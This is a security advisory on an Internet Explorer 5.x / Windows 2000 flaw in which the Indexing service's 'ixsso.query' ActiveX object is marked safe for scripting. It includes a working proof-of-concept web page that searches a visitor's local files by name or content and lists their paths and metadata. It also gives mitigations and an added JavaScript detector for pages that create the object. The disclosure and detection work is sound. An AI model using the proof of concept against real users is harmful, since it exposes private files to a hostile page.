COMMAND
Indexing service
SYSTEMS AFFECTED
IE 5.x Win2000
PROBLEM
Georgi Guninski found the following. There is a security
vulnerability in IE 5.x/Outlook/Outlook on Windows 2000 with the
Indexing service started (it is not started by default) which
allows searching for files with a specific name (wildcards are
allowed) or content. Combined with other local file reading
vulnerabilities this may be dangerous, especially the feature of
searching for files that contain certain content.
The problem is the "ixsso.query" ActiveXObject, which is used to
query the Indexing service and, surprisingly, is marked safe for
scripting. The code is:
<!-- Text field read by the Search button (document.all.query) -->
<INPUT TYPE="TEXT" NAME="query">
<INPUT TYPE="BUTTON" VALUE="Search"
 onclick="g(document.all.query.value)">
<INPUT TYPE="BUTTON" VALUE="Find *.txt files" onclick="g('@filename = *.txt')">
<BR>
<SCRIPT>
function g(q1)
{
  // The Indexing service query object, marked safe for scripting
  var qu=new ActiveXObject("ixsso.query");
  qu.Catalog="System";
  //qu.query="@contents name";
  //qu.query="#filename .htm or name near test";
  //qu.query='@filename = *.doc ';
  qu.query=q1;
  qu.Columns="filename, path, doctitle, doccomments, docauthor, size";
  var rs=qu.CreateRecordset("nonsequential");
  //alert("Records: "+rs.RecordCount);
  // Write the result set into the IFRAME below
  var doc=window.frames[0].document;
  doc.writeln("SEARCH RESULTS Records: "+rs.RecordCount+"<BR>");
  doc.writeln("<TABLE BORDER=2>");
  doc.writeln("<TR><TD>Path</TD><TD>size</TD><TD>DocAuthor</TD><TD>DocTitle</TD></TR>");
  while (!rs.EOF)
  {
    doc.writeln("<TR><TD><A TARGET='_blank' HREF='file://"+rs("Path")+"'>"+rs("Path")+"</A></TD><TD>"+rs("size")+"</TD><TD>"+rs("DocAuthor")+"</TD><TD>"+rs("DocTitle")+"</TD></TR>");
    rs.MoveNext();
  }
  doc.writeln("</TABLE>");
}
//setTimeout("g()",1000);
</SCRIPT>
<IFRAME WIDTH=700 HEIGHT=400 SRC="about:blank"></IFRAME>
Demonstration is available at:
http://www.guninski.com/indexserv1.html
SOLUTION
Disable Active Scripting or the Indexing service.
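Where neither can be disabled, HTML content (pages or HTML mail) can be checked for script that creates the object named above. The following is an added example, not part of the original advisory: the function names and the sample input are constructed for illustration, and only the "ixsso.query" ProgID comes from the advisory.

```javascript
// Added example (not from the advisory): flag HTML whose script
// creates the Indexing service query object.

// Fold adjacent string literals joined by "+" so that a ProgID split
// as "ixs"+"so.query" is still recognised. Works on a single line.
function foldLiterals(line) {
  const joined = /(["'])([^"'\\\r\n]*)\1\s*\+\s*(["'])([^"'\\\r\n]*)\3/;
  let prev;
  do {
    prev = line;
    line = line.replace(joined, (_, q1, a, q2, b) => '"' + a + b + '"');
  } while (line !== prev);
  return line;
}

// ProgID from the advisory. COM ProgIDs are case-insensitive, hence /i.
// CreateObject is the VBScript counterpart of JScript's ActiveXObject.
const CALL = /\b(ActiveXObject|CreateObject)\s*\(\s*["']\s*(ixsso\.query)\s*["']/i;

// Returns one finding per line that creates the object.
// Limitation: a literal split across two lines is not folded.
function findIndexQueryUse(html) {
  const findings = [];
  html.split(/\r?\n/).forEach((text, i) => {
    const m = CALL.exec(foldLiterals(text));
    if (m) findings.push({ line: i + 1, call: m[1], progid: m[2].toLowerCase() });
  });
  return findings;
}

// Constructed sample input: line 2 is the form used in the advisory,
// line 3 splits the ProgID and changes its case, line 4 is unrelated.
const SAMPLE = [
  '<SCRIPT>',
  'qu=new ActiveXObject("ixsso.query");',
  'var q2 = new ActiveXObject("IXS" + "SO.Qu" + \'ery\');',
  'var x = new ActiveXObject("Microsoft.XMLHTTP");',
  '</SCRIPT>',
].join("\n");

console.log(findIndexQueryUse(SAMPLE));
```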